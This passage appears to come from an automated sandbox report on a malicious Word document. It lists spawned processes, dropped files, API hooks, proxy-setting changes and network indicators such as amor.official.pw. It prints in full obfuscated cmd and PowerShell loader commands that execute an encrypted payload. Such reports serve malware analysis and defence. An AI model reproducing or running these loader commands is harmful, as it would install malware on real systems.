wADcANQAwADYAZgBiAGQAMQBjADcANABiAGMAOAA4ADIANwAyAGUAZAA4AGUAMwA0AGQANAAxADEAMAA2ADcAMQA3ADAAMQBkADIANAAyADEANgAzAGIAMwA1ADMAZAA4ADMANABmAGQAMQBiAGIANwBmAGQAMgAzADUAMgA4AGEANwA1ADIAZgA2ADYAYwA3ADAAOAA4AGUANwA0ADcANwBjADUAMgBlAGUAZQBhADkANwA3ADcAZQBjAGUAMAA1ADYAMQBkAGYAMABmAGMAYwBhADYAMwA2ADkAOQBlADQANQBmAGMAZAAwADMAOABjAGEAMgAzADcANQAyADQAYQA3AGIAYQA4AGUAYgA5AGIANgBlADgAZABiAGYANwA2ADYANQAyAGYANQBmAGEAZgBmAGUAMwA4ADkAYwA4ADEAZQA0AGIAMQBjADgAOAA3ADYANgBiADEANABhADYAOAA4AGUAOABjADYAOAAzAGEANwA2ADAAMQBjADEAOABjADkAOQAyAGUAYwA0ADMAOQA4ADAAMAAwAGYAOABmADYAMQA4ADgAMAA5AGMAMgAxADMANgBmADAANwBmAGUANQAzAGEAYgA3ADEAYQBlAGYAZgA0ADEAMAAwADMANgA0ADMAOQAzADMAYQA0ADkANwBmADAAMABlAGUAMQBmADAANgAyADgANAA0ADUAOQBiADQAYQA1ADkANABiAGUAZAA1AGYAOQA3ADEANAA1AGYAYQBkADYAMABkAGIAMwBhAGEAMgA3AGMAZAA1ADUAOQA3ADAAMwAwAGIAOQA3ADkAMAAxADkAZAAxADgANwBlADAAOQBlADkAOQBmADMAZAA0ADUAOQA3ADQAMAA3AGMAYwA4ADIANgA5ADAAMgBmADgAYQAxAGEANgA2AGYAMwAzADAAZQAyAGYAMQBiADIANQA2ADIANQBmAGEAZABiADQAMAA5AGUAOQA1AGEAYgBhADAAOAAyADYANgAyAGEAZQBkAGUAZgBhADYAYQBkADAAMQAyADIANgAzAGEAZABiAGUANgAyADkAYgA3ADIAZAAzAGYAMwAyADAAMwBjAGMAYQBmAGYAMgBmAGUAMQBmAGUAMAA2AGMAZABlAGUAZgBkAGQANgAxAGIAMwAyADYANQA0ADgAOAA3ADEANgAwAGIANABhAGMANABkADEAZgBlAGIANABiAGYAMABkADAAOQBhADcAMABlAGQAYgAyAGQAMAAwAGIAOQAxADcAMgBlAGIANQAxADcAOAAyADQANQA4ADMAYgA5AGIAZAA4ADAAMgBiADgAYwBhAGYAMgAxADYAMQA4ADkAYwA5ADEANwBhADEANgA2ADcAYgBjADUAOAAxADUAYQBkAGMAYwAyADgAZQAxAGUAZQBiADQANgBhADUANABlAGQAYwA1ADMAZgA1ADcANAA1ADEAMQA1AGUAZgAyAGQAYgAzADUANgBmADUAYgAxADYANwAxADcANQA2AGIAMgA5AGYAMwA5ADQAMABmADkANgA1ADgAZQA4ADcAMgBkADMAYgAzAGUAOABiADUAOQBiADMAYgAzADMAYgBjADMAYgBjADMAYQAzAGQAOQA4ADUAOAA4ADgAMAAzADYAYwAyADUANgA3ADcAYQA3AGEANgAzAGUAMQBhADAAZABhAGMAZQBjAGYANQA5ADUAYwA0AGQAYQAyADEAZABiAGMAMQBiADcAMwA3ADYAYwAyADIANAA5AGEAMQAzAGYAZgAzADYANAA2AGIAMgBjAGYAZQBlADkAMQA3ADcAYwBmADgAZQA1ADIAYgA3ADQAZAA2ADgANQA4ADAAMwAxADMAYwBjADAAOQAxADAAOQAwAGMANwAxADkAOQA2ADkAMgBlAGMAZgA3AGMAMgBmADcANwA3ADYAOQAxADAAMAAzADkAMwAzADkAZgA1AGUAYgBkADUAOQA1ADAAYgA1ADQAOAA2AGQAMABhADMANAA3ADMANQA0ADAANwA0ADIANwAxADkAMgA1AGUANABhAGMAYgAyADQAYgA1AGIAYQAzADcAZgA1ADIAOABkAGIAYgA0ADEAOAA3AGUAZgBmAGYAYgAyADQAYwA0ADUAZQBjADgAYwA0ADUAOABjADcAYwBkADMAZgA5ADcAZgBlADcANAAyADIAZgA4AGQANQA4AGUAOQBhADIAOAA0ADgANgA0ADIAMQA2AGQAYwAwAGIAMwA0AGQAZgBlAGUAYwBlAGUAYQAyAGQAZQA2ADUAZgA1ADcANAAyAGUANwAwADYANgA5ADYANwBkAGMAZAAzAGYANQBjADUAMABhADMAMQBkADYAMwAyADMAYwBiADAAMQBiAGYAYgA3ADMAYQA2AGMANAA1AGEAMQAyADgANQA5AGUAMQA4ADYAOABlADkAYwA1ADMAMwA2ADIAMQA1ADIAYwAxAGYAZQA2ADYAZABlAGEAMAA1AGEAYgAzAGUAZAA3AGYAYgBkAGIANAAwAGYAZABmAGMAZAAzADgAYgAxADEAMgA4AGIAYwA1ADMAMgA5AGQANQAyAGUAMQA2ADAAMwA3AGQAMgBmAGYAOABiAGIAYQA2ADcAMwAzADAAZAAxADEAZgAxADgAOQBhAGIAZgBlADkAYwAwADIAMQA2ADcAMgA5ADkANQBhADcAYgA4ADUAZABhADkAMAA4ADkAOQA0ADUAOQBmADcAMgA3ADMAYwAzADIANQBiADMAZABlAGQANAA5ADgAMABmAGYAZQBiAGYANwAzAGUAZABhAGMAMgA1AGEAYgA1ADMAOAA1ADUAYwAyAGIAMwA3ADIANwA5ADEANAA1ADIAOAAyAGYAOAA5ADgAMQBhADEAYgAzADMANQBmADAAOQAwADMAZgAxAGIAZAA2ADQAYQA4ADIANQBkADMAZgBlADgAZgBlADQANAA4ADMAZQAyADQAMQA1ADIAYQBiAGMANgA4ADQAYwBhADkAZABmADEAOAAxADEAYwAzADQAMgA4ADcAOAAwADAAOAA1ADQAMAA2ADEAYQBjAGUAYwBjADMAZgA2ADkANQA2ADIAYQBlADIAZAAwADMANQA0ADYAYwA3ADIAMwA1AGYANABhADYAOQBmADIAYQBhADUAMgBiADgAZABmADgAYQA2ADQAMwAxAGQAMAA3ADYAMgAxADEAYgBiADUAYQA1AGYAOAAzADQANwAwADUAZgBiAGYANQBhADEAMABlADIAYwBmADEAMwA2ADAANQAxADAAMQBmAGQAZAAxADYANwBiADIAMQBlADIAYQAyAGIAYQBiAGIAMAA2ADIAYgA1ADIANwBmAGUAYgA4ADkANgA4ADEAYgBkAGQANAAxADMAMABhAGMAOABiAGYAMwAxAGMAZQBiADkAMgBhADEAOQBhADAAZQBmAGMAOQA2AGEAZgAwAGYANQBkAGMAYQA0AGYANgAwAGMAYgA0AGMAMwBlAGIANwBmADQAMAA2ADAANgBlADYAOQBjADUAYQA2ADgAMgA5ADUAYwBmADAAYwA5ADIAYwA0ADcAYwA4ADYAOQBlADEAMgAxAGEAZAAxAGQANwA4AGQAYgAwAGIAMwBkADQAYgA3ADUAZAAwADcAYQA3ADAAYQAyADYAOAA5AGMAYgBiAGYAMwA2AGUAYwAzADIAZQA2ADIAMgA3AGQAYwAyAGEAOQAyADcANwAyADUAYQA5ADkAYwBkADgANgBlADEANAA3ADUAYQA4ADgAYQA4AGUAMgBiAGMAOABkAGUAZQAzADUAMgAzADEANwA1ADAAOABmADcAMQAwAGUAZgA3AGMAMgA2AGYAYgA5AGQAOAA2ADkAMQBjAGMAZAAyADIAMgBiADcAMAAzADMANQA4ADgAOABkAGMAOAAxADQAZABhADQANQA3ADAAZgBhADkANwAzAGUAMQA3AGEANAAzADgAOQA0ADUAMgAwAGUAOQBhADAANwA1AGYAMAAzADcAMABjAGUAMgBjADcAMQBmADUAMwBhADIAZgAwAGYAOABiAGIAMABlAGIAYgBjADMAOQBlADQANwA3AGEAZgA2AGQAMQA3AGUAZQBmADQAYQA1AGMAMQBkADcAYgA4ADEANwAwADIANgAyAGMANwA0AGEAYgAyADIAYgBkADYAZQBlADAAYQA2ADEAZgA5AGMANQA3AGMAMgBlADQANAA2ADkAOAAxADgANgBlADAAMgAwADgAOQA0ADEAOQBhADYAMQA2AA==' |ConVerTTO-secuREStrING -KEy (146..169)) ))))" (Show Process), Spawned process "powershell.exe" with commandline "powershell "iEX(( [RuNTime.InteropsErviCEs.maRsHaL]::PTrTOsTRinGAUto( [rUNtImE.iNTERoPSERVIceS.marsHAL]::SecUReStriNGTOBSTR($('76492d1116743f0423413b16050a5345MgB8AGUAQgBpAFgAawBzAGMATgBrAEgAQgBiAE4AUAB2AFUATgBPAHkAMQBuAGcAPQA9AHwAZABhAGQAMgA1ADUAMwBjAGIAMwA0ADEANABlAGQAZQA4ADEAZAA3ADIAMAA3ADYAYgA5ADcAZQA5ADgAYgA4ADMAMgAwAGEANABiAGIAZQBiADgAOAA3AGQAMgAyAGUAOQA4AGEAZABlADcAYQBlADQAYQA5AGYAZABlADQAMwBhAGYAMgAyADcANgAxADAAYgA5ADcAYgA1ADIAOQBmAGQAZQA3ADIAZABiADAAYwA5ADkAOABiAGQAMQBlADEAMgBmADkANABjADkAMgAxADAAOAA1ADkAMwBjADcAZgBlAGIAZAA4AGMAZgA2AGQAZQBiAGMANwBmADYANQA0ADIANgBmAGIANwA2ADYAZAAyADkAMQAwADUAZQA0ADMAMgA1AGIAOQBiAGEAYgA4ADgANgA3ADQAMAAzADYAYgA3AGEANwA3ADUANQA5AGUANwAxAGIAMQAyAGMAMAA0AGMAZgA4AGMANAA0AGMAYQA5ADYAYwA5AGYANQAzADMAMAA3ADQAMAA5AGMAMgA1ADUAMQAxAGEAYgA0ADIAZQBjADQAZAAzAGUAOQAxAGUANABmADYAMgA2AGIANgBmADAAMQAwADMANgA3ADkAMAAzADMAZQA5ADgANgA1AGUAMABkADQANQA3AGQANAAzADMANABmAGQAOQA1AGQAOABiADgANQBiADAAZABiAGIAMQA5ADcAOAA4ADAAZQA4AGYAMAA4ADcAMgA2ADQAOQBiAGMAYQAwADQAZQAxADkAYwBiAGYANgA4ADEANQBiADMAMgAxADkAZQBiADQAZAAxADUAOQA5AGIANgA1AGYAMwBhAGIAZgA3ADgANQBiAGEAMQAzADMAYwA0ADkANwA1ADIAOAAzADkAZQBiADAAMwAwAGQAMQA4ADEAOABlADUANgAxADAAMgA2ADAAMgAwADcANQAwADYAZgBiAGQAMQBjADcANABiAGMAOAA4ADIANwAyAGUAZAA4AGUAMwA0AGQANAAxADEAMAA2ADcAMQA3ADAAMQBkADIANAAyADEANgAzAGIAMwA1ADMAZAA4ADMANABmAGQAMQBiAGIANwBmAGQAMgAzADUAMgA4AGEANwA1ADIAZgA2ADYAYwA3ADAAOAA4AGUANwA0ADcANwBjADUAMgBlAGUAZQBhADkANwA3ADcAZQBjAGUAMAA1ADYAMQBkAGYAMABmAGMAYwBhADYAMwA2ADkAOQBlADQANQBmAGMAZAAwADMAOABjAGEAMgAzADcANQAyADQAYQA3AGIAYQA4AGUAYgA5AGIANgBlADgAZABiAGYANwA2ADYANQAyAGYANQBmAGEAZgBmAGUAMwA4ADkAYwA4ADEAZQA0AGIAMQBjADgAOAA3ADYANgBiADEANABhADYAOAA4AGUAOABjADYAOAAzAGEANwA2ADAAMQBjADEAOABjADkAOQAyAGUAYwA0ADMAOQA4ADAAMAAwAGYAOABmADYAMQA4ADgAMAA5AGMAMgAxADMANgBmADAANwBmAGUANQAzAGEAYgA3ADEAYQBlAGYAZgA0ADEAMAAwADMANgA0ADMAOQAzADMAYQA0ADkANwBmADAAMABlAGUAMQBmADAANgAyADgANAA0ADUAOQBiADQAYQA1ADkANABiAGUAZAA1AGYAOQA3ADEANAA1AGYAYQBkADYAMABkAGIAMwBhAGEAMgA3AGMAZAA1ADUAOQA3ADAAMwAwAGIAOQA3ADkAMAAxADkAZAAxADgANwBlADAAOQBlADkAOQBmADMAZAA0ADUAOQA3ADQAMAA3AGMAYwA4ADIANgA5ADAAMgBmADgAYQAxAGEANgA2AGYAMwAzADAAZQAyAGYAMQBiADIANQA2ADIANQBmAGEAZABiADQAMAA5AGUAOQA1AGEAYgBhADAAOAAyADYANgAyAGEAZQBkAGUAZgBhADYAYQBkADAAMQAyADIANgAzAGEAZABiAGUANgAyADkAYgA3ADIAZAAzAGYAMwAyADAAMwBjAGMAYQBmAGYAMgBmAGUAMQBmAGUAMAA2AGMAZABlAGUAZgBkAGQANgAxAGIAMwAyADYANQA0ADgAOAA3ADEANgAwAGIANABhAGMANABkADEAZgBlAGIANABiAGYAMABkADAAOQBhADcAMABlAGQAYgAyAGQAMAAwAGIAOQAxADcAMgBlAGIANQAxADcAOAAyADQANQA4ADMAYgA5AGIAZAA4ADAAMgBiADgAYwBhAGYAMgAxADYAMQA4ADkAYwA5ADEANwBhADEANgA2ADcAYgBjADUAOAAxADUAYQBkAGMAYwAyADgAZQAxAGUAZQBiADQANgBhADUANABlAGQAYwA1ADMAZgA1ADcANAA1ADEAMQA1AGUAZgAyAGQAYgAzADUANgBmADUAYgAxADYANwAxADcANQA2AGIAMgA5AGYAMwA5ADQAMABmADkANgA1ADgAZQA4ADcAMgBkADMAYgAzAGUAOABiADUAOQBiADMAYgAzADMAYgBjADMAYgBjADMAYQAzAGQAOQA4ADUAOAA4ADgAMAAzADYAYwAyADUANgA3ADcAYQA3AGEANgAzAGUAMQBhADAAZABhAGMAZQBjAGYANQA5ADUAYwA0AGQAYQAyADEAZABiAGMAMQBiADcAMwA3ADYAYwAyADIANAA5AGEAMQAzAGYAZgAzADYANAA2AGIAMgBjAGYAZQBlADkAMQA3ADcAYwBmADgAZQA1ADIAYgA3ADQAZAA2ADgANQA4ADAAMwAxADMAYwBjADAAOQAxADAAOQAwAGMANwAxADkAOQA2ADkAMgBlAGMAZgA3AGMAMgBmADcANwA3ADYAOQAxADAAMAAzADkAMwAzADkAZgA1AGUAYgBkADUAOQA1ADAAYgA1ADQAOAA2AGQAMABhADMANAA3ADMANQA0ADAANwA0ADIANwAxADkAMgA1AGUANABhAGMAYgAyADQAYgA1AGIAYQAzADcAZgA1ADIAOABkAGIAYgA0ADEAOAA3AGUAZgBmAGYAYgAyADQAYwA0ADUAZQBjADgAYwA0ADUAOABjADcAYwBkADMAZgA5ADcAZgBlADcANAAyADIAZgA4AGQANQA4AGUAOQBhADIAOAA0ADgANgA0ADIAMQA2AGQAYwAwAGIAMwA0AGQAZgBlAGUAYwBlAGUAYQAyAGQAZQA2ADUAZgA1ADcANAAyAGUANwAwADYANgA5ADYANwBkAGMAZAAzAGYANQBjADUAMABhADMAMQBkADYAMwAyADMAYwBiADAAMQBiAGYAYgA3ADMAYQA2AGMANAA1AGEAMQAyADgANQA5AGUAMQA4ADYAOABlADkAYwA1ADMAMwA2ADIAMQA1ADIAYwAxAGYAZQA2ADYAZABlAGEAMAA1AGEAYgAzAGUAZAA3AGYAYgBkAGIANAAwAGYAZABmAGMAZAAzADgAYgAxADEAMgA4AGIAYwA1ADMAMgA5AGQANQAyAGUAMQA2ADAAMwA3AGQAMgBmAGYAOABiAGIAYQA2ADcAMwAzADAAZAAxADEAZgAxADgAOQBhAGIAZgBlADkAYwAwADIAMQA2ADcAMgA5ADkANQBhADcAYgA4ADUAZABhADkAMAA4ADkAOQA0ADUAOQBmADcAMgA3ADMAYwAzADIANQBiADMAZABlAGQANAA5ADgAMABmAGYAZQBiAGYANwAzAGUAZABhAGMAMgA1AGEAYgA1ADMAOAA1ADUAYwAyAGIAMwA3ADIANwA5ADEANAA1ADIAOAAyAGYAOAA5ADgAMQBhADEAYgAzADMANQBmADAAOQAwADMAZgAxAGIAZAA2ADQAYQA4ADIANQBkADMAZgBlADgAZgBlADQANAA4ADMAZQAyADQAMQA1ADIAYQBiAGMANgA4ADQAYwBhADkAZABmADEAOAAxADEAYwAzADQAMgA4ADcAOAAwADAAOAA1ADQAMAA2ADEAYQBjAGUAYwBjADMAZgA2ADkANQA2ADIAYQBlADIAZAAwADMANQA0ADYAYwA3ADIAMwA1AGYANABhADYAOQBmADIAYQBhADUAMgBiADgAZABmADgAYQA2ADQAMwAxAGQAMAA3ADYAMgAxADEAYgBiADUAYQA1AGYAOAAzADQANwAwADUAZgBiAGYANQBhADEAMABlADIAYwBmADEAMwA2ADAANQAxADAAMQBmAGQAZAAxADYANwBiADIAMQBlADIAYQAyAGIAYQBiAGIAMAA2ADIAYgA1ADIANwBmAGUAYgA4ADkANgA4ADEAYgBkAGQANAAxADMAMABhAGMAOABiAGYAMwAxAGMAZQBiADkAMgBhADEAOQBhADAAZQBmAGMAOQA2AGEAZgAwAGYANQBkAGMAYQA0AGYANgAwAGMAYgA0AGMAMwBlAGIANwBmADQAMAA2ADAANgBlADYAOQBjADUAYQA2ADgAMgA5ADUAYwBmADAAYwA5ADIAYwA0ADcAYwA4ADYAOQBlADEAMgAxAGEAZAAxAGQANwA4AGQAYgAwAGIAMwBkADQAYgA3ADUAZAAwADcAYQA3ADAAYQAyADYAOAA5AGMAYgBiAGYAMwA2AGUAYwAzADIAZQA2ADIAMgA3AGQAYwAyAGEAOQAyADcANwAyADUAYQA5ADkAYwBkADgANgBlADEANAA3ADUAYQA4ADgAYQA4AGUAMgBiAGMAOABkAGUAZQAzADUAMgAzADEANwA1ADAAOABmADcAMQAwAGUAZgA3AGMAMgA2AGYAYgA5AGQAOAA2ADkAMQBjAGMAZAAyADIAMgBiADcAMAAzADMANQA4ADgAOABkAGMAOAAxADQAZABhADQANQA3ADAAZgBhADkANwAzAGUAMQA3AGEANAAzADgAOQA0ADUAMgAwAGUAOQBhADAANwA1AGYAMAAzADcAMABjAGUAMgBjADcAMQBmADUAMwBhADIAZgAwAGYAOABiAGIAMABlAGIAYgBjADMAOQBlADQANwA3AGEAZgA2AGQAMQA3AGUAZQBmADQAYQA1AGMAMQBkADcAYgA4ADEANwAwADIANgAyAGMANwA0AGEAYgAyADIAYgBkADYAZQBlADAAYQA2ADEAZgA5AGMANQA3AGMAMgBlADQANAA2ADkAOAAxADgANgBlADAAMgAwADgAOQA0ADEAOQBhADYAMQA2AA==' |ConVerTTO-secuREStrING -KEy (146..169)) ))))" (Show Process)
Spawned process "195082.exe" (Show Process)
Spawned process "195082.exe" (Show Process) - source
- Monitored Target
- relevance
- 3/10
-
Contacts domains
-
Installation/Persistance
-
Dropped files
- details
-
"195082.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
"~$9168ef97cd243be323636ec3da04a59630e8eaa317549cc0e69445776447a6.doc" has type "data"
"129168ef97cd243be323636ec3da04a59630e8eaa317549cc0e69445776447a6.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Archive ctime=Wed Jan 31 09:15:39 2018 mtime=Wed Jan 31 09:15:39 2018 atime=Wed Jan 31 09:16:04 2018 length=226304 window=hide"
"~WRS{6F053C44-FAC4-4CB6-B75C-D30842EE3494}.tmp" has type "data"
"index.dat" has type "data"
"8TCMB5ZGMHB3S9U7XP4L.temp" has type "data"
"~$Normal.dotm" has type "data" - source
- Binary File
- relevance
- 3/10
-
Opens the MountPointManager (often used to detect additional infection locations)
- details
- "powershell.exe" opened "\Device\MountPointManager"
- source
- API Call
- relevance
- 5/10
-
Touches files in the Windows directory
- details
-
"WINWORD.EXE" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\user32.dll.mui"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
"WINWORD.EXE" touched file "C:\Windows\System32\rsaenh.dll"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\KernelBase.dll.mui"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6F053C44-FAC4-4CB6-B75C-D30842EE3494}.tmp"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\msctf.dll.mui"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{66758469-FC90-43A0-9F39-0EC9C13436FC}.tmp"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{031F2E9C-5864-470B-B484-C4455FED1851}.tmp"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{031F2E9C-5864-470B-B484-C4455FED1851}.tmp"
"WINWORD.EXE" touched file "C:\Windows\System32\stdole2.tlb"
"WINWORD.EXE" touched file "C:\Windows\System32\spool\drivers\x64\3\sendtoonenote.BUD"
"WINWORD.EXE" touched file "C:\Windows\System32\spool\drivers\x64\3\sendtoonenote.gpd"
"WINWORD.EXE" touched file "C:\Windows\System32\spool\drivers\x64\3\stdnames.gpd"
"WINWORD.EXE" touched file "C:\Windows\System32\spool\drivers\x64\3\SendToOneNoteNames.gpd"
"WINWORD.EXE" touched file "C:\Windows\System32\spool\drivers\x64\3\SendToOneNoteFilter.gpd"
"WINWORD.EXE" touched file "C:\Windows\System32\spool\drivers\x64\3\SendToOneNote.ini" - source
- API Call
- relevance
- 7/10
-
Dropped files
-
Network Related
-
Found potential URL in binary/memory
- details
-
Pattern match: "http://schemas.openxmlformats.org/drawingml/2006/main"
Pattern match: "http://dmd.metaservices.microsoft.com/dms/metadata.svc"
Pattern match: "http://schemas.microsoft.com/windowsmetadata/services/2007/09/18/dms/DeviceMetadataService/GetDeviceMetadata"
Heuristic match: "GET /msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?cc1043c359113e4e HTTP/1.1Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 20 Apr 2017 16:02:20 GMTIf-None-Match: 04e707defb9d21:0User-Agent: Microsoft-CryptoAPI/6.1Hos"
Heuristic match: "GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab?a2e92fdaed906d8e HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Microsoft-CryptoAPI/6.1Host: ctldl.windowsupdate.com"
Heuristic match: "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD%2BOyl%2B0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCED141%2Fl2SWCyYX308B7Khio%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Microsoft-CryptoAPI/6.1Host: s2.symcb.com"
Pattern match: "http://www.symauth.com/cps0"
Pattern match: "http://www.symauth.com/rpa0"
Heuristic match: "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQe6LNDJdqx%2BJOp7hVgTeaGFJ%2FCQgQUljtT8Hkzl699g%2B8uK8zKt4YecmYCEBuN56dlW1Lzehhu%2FtdSD3U%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Microsoft-CryptoAPI/6.1Host: sv.symcd.com"
Pattern match: "http://www.symauth.com/cps0*"
Heuristic match: "GET /CRL/Omniroot2025.crl HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Microsoft-CryptoAPI/6.1Host: cdp1.public-trust.com"
Heuristic match: "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAt%2BEJA8OEkP%2Bi9nmoehp7k%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Microsoft-CryptoAPI/6.1Host: ocsp.digicert.com"
Heuristic match: "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSLIycRsoI3J6zPns4K1aQgAqaqHgQUZ50PIAkMzIo65YJGcmL88cyQ5UACEAG2Yem3HYLmNssdMr3TCFk%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Microsoft-CryptoAPI/6.1Host: ocsp.digicert.com"
Pattern match: "www.utilitybillingsoftwares.com"
Pattern match: "http://amor.official.pw/f3sqVF/"
Pattern match: "http://amor.official.pw/f3sqVF//"
Pattern match: "passlist.txt/passlist.txt"
Pattern match: "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"
Pattern match: "www.erzotech.eu"
Pattern match: "www.microsoft.com"
Heuristic match: "amor.official.pw"
Heuristic match: "t-p-e.net"
Heuristic match: "$nsadasd = &('n'+'e'+'w-objec'+'t') random;$YYU = .('ne'+'w'+'-object') System.Ne" - source
- File/Memory
- relevance
- 10/10
-
Found potential URL in binary/memory
-
System Security
-
Hooks API calls
- details
-
"SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE"
"OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
"VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
"SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
"VariantClear@OLEAUT32.DLL" in "WINWORD.EXE" - source
- Hook Detection
- relevance
- 10/10
-
Modifies proxy settings
- details
-
"powershell.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"powershell.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS") - source
- Registry Access
- relevance
- 10/10
-
Hooks API calls
-
Unusual Characteristics
-
Installs hooks/patches the running process
- details
-
"WINWORD.EXE" wrote bytes "e933effefecccc" to virtual address "0xFE301210" ("SysFreeString@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "b9238b267db0d301" to virtual address "0xE9232350" (part of module "OART.DLL")
"WINWORD.EXE" wrote bytes "e913b0e9ff" to virtual address "0xFD4550C0" ("OleLoadFromStream@OLE32.DLL")
"WINWORD.EXE" wrote bytes "bffdad267db0d301" to virtual address "0xE7F8D610" (part of module "MSO.DLL")
"WINWORD.EXE" wrote bytes "346ea7277db0d301" to virtual address "0x3FC23258" (part of module "WINWORD.EXE")
"WINWORD.EXE" wrote bytes "e94b9ffefecccccccccc" to virtual address "0xFE306230" ("VariantChangeType@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "e9abc0fefecc" to virtual address "0xFE304060" ("SysAllocStringByteLen@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "8c61dd267db0d301" to virtual address "0xF157DE48" (part of module "RICHED20.DLL")
"WINWORD.EXE" wrote bytes "48b8bc52b7e6fe070000ffe0" to virtual address "0x76DF9020" ("SetUnhandledExceptionFilter@KERNEL32.DLL")
"WINWORD.EXE" wrote bytes "6c5d89267db0d301" to virtual address "0xEB2371C0" (part of module "WWLIB.DLL")
"WINWORD.EXE" wrote bytes "c04e8b267db0d301" to virtual address "0xF1CAFA00" (part of module "GFX.DLL")
"WINWORD.EXE" wrote bytes "901bdc7f7db0d301" to virtual address "0xF24125D8" (part of module "MSPROOF7.DLL")
"WINWORD.EXE" wrote bytes "e933f0fefe" to virtual address "0xFE301180" ("VariantClear@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "ac68cf267db0d301" to virtual address "0xF16F0160" (part of module "MSPTLS.DLL")
"powershell.exe" wrote bytes "65488b042580150000" to virtual address "0xF0B9863C" (part of module "MSCORWKS.DLL")
"powershell.exe" wrote bytes "65488b042588150000" to virtual address "0xF0B98C0B" (part of module "MSCORWKS.DLL")
"powershell.exe" wrote bytes "654c8b1c2580150000" to virtual address "0xF0B974FB" (part of module "MSCORWKS.DLL")
"powershell.exe" wrote bytes "65488b042588150000" to virtual address "0xF0B98C4B" (part of module "MSCORWKS.DLL")
"powershell.exe" wrote bytes "654c8b1c2580150000" to virtual address "0xF0B9743F" (part of module "MSCORWKS.DLL")
"powershell.exe" wrote bytes "65488b042580150000" to virtual address "0xF0B97A44" (part of module "MSCORWKS.DLL") - source
- Hook Detection
- relevance
- 10/10
-
Invokes a process with a very long commandline
- details
- "cmd jTEAdZpiDaiYz qjMfFiOJizKUzshGiIowLoWFqV KkWYSZzkWIXn & %C^om^S^pEc% %C^om^S^pEc% /V /c set %btHkJMzDjjiWVZK%=WYrzozjmBIwYc&&set %var1%=p&&set %var2%=ow&&set %ArQWcsLIfSRKwwT%=DWcTblEVs&&set %var7%=!%var1%!&&set %sdJUjBQbairSAth%=hrFapszPTzlTFB&&set %var3%=er&&set %var8%=!%var2%!&&set %var4%=s&&set %PnudkPBnvRAjVPb%=DdvUuuz&&set %var5%=he&&set %var6%=ll&&!%var7%!!%var8%!!%var3%!!%var4%!!%var5%!!%var6%! "iEX(( [RuNTime.InteropsErviCEs.maRsHaL]::PTrTOsTRinGAUto( [rUNtImE.iNTERoPSERVIceS.marsHAL]::SecUReStriNGTOBSTR($('76492d1116743f0423413b16050a5345MgB8AGUAQgBpAFgAawBzAGMATgBrAEgAQgBiAE4AUAB2AFUATgBPAHkAMQBuAGcAPQA9AHwAZABhAGQAMgA1ADUAMwBjAGIAMwA0ADEANABlAGQAZQA4ADEAZAA3ADIAMAA3ADYAYgA5ADcAZQA5ADgAYgA4ADMAMgAwAGEANABiAGIAZQBiADgAOAA3AGQAMgAyAGUAOQA4AGEAZABlADcAYQBlADQAYQA5AGYAZABlADQAMwBhAGYAMgAyADcANgAxADAAYgA5ADcAYgA1ADIAOQBmAGQAZQA3ADIAZABiADAAYwA5ADkAOABiAGQAMQBlADEAMgBmADkANABjADkAMgAxADAAOAA1ADkAMwBjADcAZgBlAGIAZAA4AGMAZgA2AGQAZQBiAGMANwBmADYANQA0ADIANgBmAGIANwA2ADYAZAAyADkAMQAwADUAZQA0ADMAMgA1AGIAOQBiAGEAYgA4ADgANgA3ADQAMAAzADYAYgA3AGEANwA3ADUANQA5AGUANwAxAGIAMQAyAGMAMAA0AGMAZgA4AGMANAA0AGMAYQA5ADYAYwA5AGYANQAzADMAMAA3ADQAMAA5AGMAMgA1ADUAMQ